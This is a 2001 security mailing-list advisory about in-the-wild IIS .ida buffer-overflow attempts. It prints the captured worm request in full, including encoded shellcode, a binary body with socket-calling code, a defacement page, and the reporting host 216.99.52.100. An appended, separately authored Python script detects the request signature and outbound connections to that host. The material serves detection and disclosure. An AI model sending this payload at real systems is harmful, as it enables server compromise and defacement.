Security Incidents mailing list archives

IIS .ida exploit involving worm.com / 181.com / 216.99.52.100


From: Richard Bejtlich <richard () taosecurity com>
Date: Sun, 15 Jul 2001 16:25:42 -0500

Friends in the security world,

I have recently observed multiple exploit attempts related to the "Microsoft Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability" described here:

http://www.securityfocus.com/frames/?content=/vdb/bottom.html%3Fvid%3D2880

It looks like successful execution of an exploit in the wild may result in the compromised machine making a connection to www.worm.com to report its status (216.99.52.100, also aliased as 181.com and chinga.com; note chinga.com also has an address of 209.81.7.23). Below is the signature of the exploit. I edited sections marked XXcensoredXX to preserve my privacy:

GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
 Accept: */*
Content-length: 3569

USVWp
hdGd=o
`hXw
pXXXxu
XX3f=MZXQ<X3fPEyXB<XTxXTTHXLL:KERN3LxEL32 X4TXB LHHHLLTH;HLX<GetPLX|rocAHHXTH$3f
LTQLLLLLLLXTH
LLXp
Gdpu8LLLhhu!hP;CKCK4*hQ4Rp;CKCKLhhhthhShhMlLhE[SScxMQPPu&jLPhQUBPl;CKCKPd}\PPPifPtEPH,RjLPQjj;CKCK;CKCKLLLLtghm;CKCKL4LLHhPPPh9PsP:LMTHuPLAHRjh@P;CKCKLLLL0}VL;u>L`hQ%;CKCKLLRHPh@Q;CKCKjhjjjhhcP;CKCK00tth;CKCK8R;CKCK>LLLLG:8P;CKCK>LLLL|th;CKCKjd;CKCKjjj;CKCKxf|f~P[j|QxR;CKCKLLLL}7h;CKCKjjQxR;CKCKh;CKCKDPPPiYPitPti3SkttPPtPut
tjd;CKCKjjj;CKCKxf|f~Ptj|RxP;CKCKjjhQxR;CKCKLEHhdddLLdtjLPMQhRxP;CKCKjjhQxR;CKCKLEHddddLLdtjLPMQdRxP;CKCKLhdddLLdtjLPhQxR;CKCKEHpLjLREHxQxR;CKCKjhPxQ;CKCKLxR;CKCK0XUWSVPj<Vhpt$(XPt$PX^[_] {xV4xV4xV4xV4xV4XPhGD$BE3LoadLibraryAGetSystemTimeCreateThreadCreateFileASleepGetSystemDefaultLangIDVirtualProtectinfocomm.dllTcpSockSendWS2_32.dllsocketconnectsendrecvclosesocketw3svc.dllGET ? HTTP/1.0
Content-type: text/xml
HOST:www.worm.com
 Accept: */*
Content-length: 3569

c:\notwormLMTH
<html><head><meta http-equiv="Content-Type" content="text/html; charset=english"><title>HELLO!</title></head><bady><hr size=5><font color="red"><p align="center">Welcome to http://www.worm.com !<br><br>Hacked By Chinese!</font></hr></bady></html> HTTP/1.0 200
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 90

<TITLE>Error</TITLE>
<BODY>
<H1>Error</H1>
XXcensoredXX: Unknown WWW server.</BODY>

-----

Curious about www.worm.com, I connected to port 80 on the box and found this:

telnet www.worm.com 80
Trying 216.99.52.100...
Connected to chinga.com (216.99.52.100).
Escape character is '^]'.


<HTML>
<HEAD>
<META HTTP-EQUIV="REFRESH" CONTENT="0.01; URL=http://www.goto.com/d/home/p/nettcorp/lander/srchindex.jhtml";>
<TITLE> Nett Corp </TITLE>
</HEAD>
<blockquote><!-- dlogphp activated, unique hit site is 181.com. IP is XXcensored, but it was my IP addressXX. Broswer is -->
</blockquote>
</BODY>
</HTML>
Connection closed by foreign host.

-----

You can see in the 'dlogphp activated' section that my IP address appears to have been logged. (I removed the actual IP address.)

I suggest that readers check their logs for connections to 216.99.52.100 (www.worm.com), as outbound connections MAY indicate a compromised host. I am not a Windows expert and cannot validate the exploit as recorded in my logs, but I believe you may find this warning useful.

Sincerely,

Richard Bejtlich
http://bejtlich.net
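The post recommends checking logs for the .ida request and for outbound connections to 216.99.52.100. The following Python script is an added example of that check, not code from the original message or its author. It takes the request signature and the reporting hosts/addresses only from the post; the access-log layout (Apache-style common log format), the flow-record layout, the minimum repeated-character run length of 100, and all sample lines are assumptions constructed for the example.

```python
import re
from typing import Dict, Iterable, List

# Indicators quoted from the post above (not invented here): the hostnames
# and addresses a compromised IIS host contacts after the overflow succeeds.
REPORTING_HOSTS = {"www.worm.com", "181.com", "chinga.com"}
REPORTING_IPS = {"216.99.52.100", "209.81.7.23"}

# Request signature from the post: /default.ida? followed by a long run of one
# repeated letter (N in the capture) and then %uXXXX-encoded overflow bytes.
# The minimum run length (100) is an assumption chosen to avoid matching
# ordinary short queries against default.ida.
IDA_OVERFLOW = re.compile(
    r"/default\.ida\?([A-Za-z])\1{100,}(?:%u[0-9A-Fa-f]{4}){4,}",
    re.IGNORECASE,
)

# Assumed access-log layout for this example (Apache-style common log format):
# client ident authuser [date] "request" status bytes
ACCESS_LINE = re.compile(
    r'^(?P<client>\S+)\s+\S+\s+\S+\s+\[[^\]]*\]\s+"(?P<request>[^"]*)"\s+(?P<status>\d{3})'
)

# Assumed firewall/flow record layout for this example:
# date time src_ip dst_ip dst_port
FLOW_LINE = re.compile(
    r"^(?P<date>\S+)\s+(?P<time>\S+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<port>\d+)$"
)


def is_ida_overflow_request(request: str) -> bool:
    """True if a request line (or a full raw request) carries the .ida overflow pattern."""
    return IDA_OVERFLOW.search(request) is not None


def has_worm_host_header(raw_request: str) -> bool:
    """True if the captured request's Host header names one of the reporting hosts."""
    for line in raw_request.splitlines():
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "host" and value.strip().lower() in REPORTING_HOSTS:
            return True
    return False


def scan_access_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """One record per access-log line matching the overflow signature.
    A 404 on a non-IIS server still shows the client is sweeping for .ida."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if m and is_ida_overflow_request(m.group("request")):
            hits.append({"client": m.group("client"), "status": m.group("status")})
    return hits


def flag_reporting_connections(records: Iterable[str]) -> List[str]:
    """Source addresses that connected to a reporting IP on port 80; the post
    says such outbound connections MAY indicate a compromised host."""
    sources = []
    for rec in records:
        m = FLOW_LINE.match(rec)
        if m and m.group("dst") in REPORTING_IPS and m.group("port") == "80":
            sources.append(m.group("src"))
    return sources


# Constructed samples (not real logs); the request mirrors the capture in the post.
SAMPLE_REQUEST = (
    "GET /default.ida?" + "N" * 224
    + "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
    + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0"
)
SAMPLE_RAW = SAMPLE_REQUEST + "\r\nContent-type: text/xml\r\nHOST:www.worm.com\r\n Accept: */*\r\n"
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - [15/Jul/2001:16:20:01 -0500] "' + SAMPLE_REQUEST + '" 200 90',
    '192.0.2.11 - - [15/Jul/2001:16:21:07 -0500] "GET /index.html HTTP/1.0" 200 1234',
]
SAMPLE_FLOWS = [
    "2001-07-15 16:20:02 10.0.0.5 216.99.52.100 80",
    "2001-07-15 16:20:05 10.0.0.6 198.51.100.7 443",
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_ACCESS_LOG))
    print(flag_reporting_connections(SAMPLE_FLOWS))
```

The two checks are deliberately independent: the access-log scan catches inbound attempts (including failed ones against non-IIS servers), while the flow check catches the post-compromise report to 216.99.52.100, which is the stronger signal because a patched or non-IIS host has no reason to contact that address.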
